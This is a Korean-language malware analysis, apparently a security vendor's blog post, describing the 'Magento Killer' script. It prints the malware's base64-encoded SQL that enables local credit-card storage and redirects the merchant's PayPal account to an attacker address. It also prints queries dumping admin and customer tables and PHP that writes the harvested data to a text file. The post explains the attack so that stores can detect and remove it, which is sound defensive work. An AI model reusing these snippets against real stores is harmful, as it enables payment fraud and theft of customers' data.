"Magento Killer라는 이름으로 새로 발견된 스크립트 "는 최근 Magento 웹사이트를 표적으로 삼고 있습니다. 스크립트 $ConfKiller 웹 사이트에서 가장 중요한 파일, 즉 구성 파일(구성 파일)을 대상으로 합니다. 또한 $ConfKiller 스크립트가 성공적으로 실행되면 공격받은 Magento 데이터베이스의 core_config_data 테이블을 수정할 수 있습니다.
전체 Magento 설치를 종료하지는 않지만 그럼에도 불구하고 웹 사이트에 해를 끼칩니다. Magento 킬러는 신용 카드 정보, 개인 식별 정보, 이메일, 청구서 수신 주소 등이 포함된 심각한 데이터 도난을 다룹니다.
$ConfKiller:작전 방식
해커는 이 데이터를 훔치기 위해 일련의 단계를 따릅니다. 나는 마젠토 킬러 스크립트의 작동 방식을 가능한 한 간단하게 설명하려고 노력했습니다. 따라서 다음과 같이 진행됩니다.
1단계:판매자의 PayPal 계정 대체
첫째, 공격자는 base64에 특수하게 인코딩된 SQL 쿼리를 삽입합니다. 이 삽입된 쿼리는 다음과 같습니다.
$ConfKiller = array(
'Update DB (Savecc)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
'Update PP (MailPP)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account'; 이 코드를 깨면 여기에 두 가지 요청이 있음을 알 수 있습니다.
- DB 업데이트(Savecc): 이 요청은 클라이언트 신용 카드 정보를 저장하도록 Magento 웹사이트를 구성합니다. 서버에서 백엔드로 보내는 일반적인 시나리오 대신 결제 프로세서(예:authorize.net)입니다.
- PP(MailPP) 업데이트:지금, t 그의 요청은 표적 Magento 사이트에 있는 판매자의 PayPal 계정을 해커가 원하는 대로 다른 계정으로 대체합니다.
일반적으로 Magento는 로컬에 저장된 신용 카드 정보를 암호화하지만 이 경우 여기에서 많은 보호를 제공할 수 없습니다.
따라서 공격자는 Magento 파일 ./app/etc/local.xml에서 암호화 키를 훔칠 수 있습니다. 현재 그들은 웹사이트의 파일 시스템에 대한 액세스 권한을 보유하고 있습니다. 이 키로 신용 카드 정보를 일반 텍스트와 같이 더 이해하기 쉬운 것으로 해독할 수 있습니다.
2단계:추가된 고객 정보 도용
해커가 신용 카드 정보를 훔쳤더라도 보완 데이터 없이는 사용할 수 없습니다. 따라서 해커는 다음으로 이름, 이메일, 청구서 수신 주소, 전화번호 등과 같은 추가된 고객 데이터를 확보하려고 시도합니다.
그는 해커에게 데이터베이스를 표시하는 쿼리로 다음 코드 줄을 보냅니다.
$query = array( 'admin_user' => 'SELECT * FROM admin_user' , 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' , 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' , 'customer_entity' => 'SELECT * FROM customer_entity' ,
3단계:텍스트 파일의 데이터 가져오기
마지막으로 그는 몇 가지 중요한 선택된 데이터를 텍스트 파일로 전송합니다. 이 경우 *-shcMail.txt 텍스트 파일입니다. 다음은 Magento Killer의 공격 성공을 보장하는 코드입니다.
$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
$mail[] = $kolom_db[$shcolom[$shc_key]];
$myfile = fopen($namefile, "a+") or die("Unable to open file!");
fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."rn");
fclose($myfile); 이 스크립트는 *-shcMail.txt에 대한 링크를 생성합니다. 파일. 마지막으로 초기 2가지 설정 변경 성공 여부를 공격자에게 알려주는 결과를 보여줍니다.
결론
웹사이트도 이 멀웨어에 감염된 것을 발견했다면 이 가이드에 따라 Magento 웹사이트에서 멀웨어를 제거하십시오.
또는 다른 긴 게시물을 읽는 번거로움을 건너뛰고 여기에서 즉각적인 맬웨어 제거를 이용할 수 있습니다. . 아직 감염되지 않은 경우 이 Magento 보안 체크리스트로 웹사이트를 보호하세요. .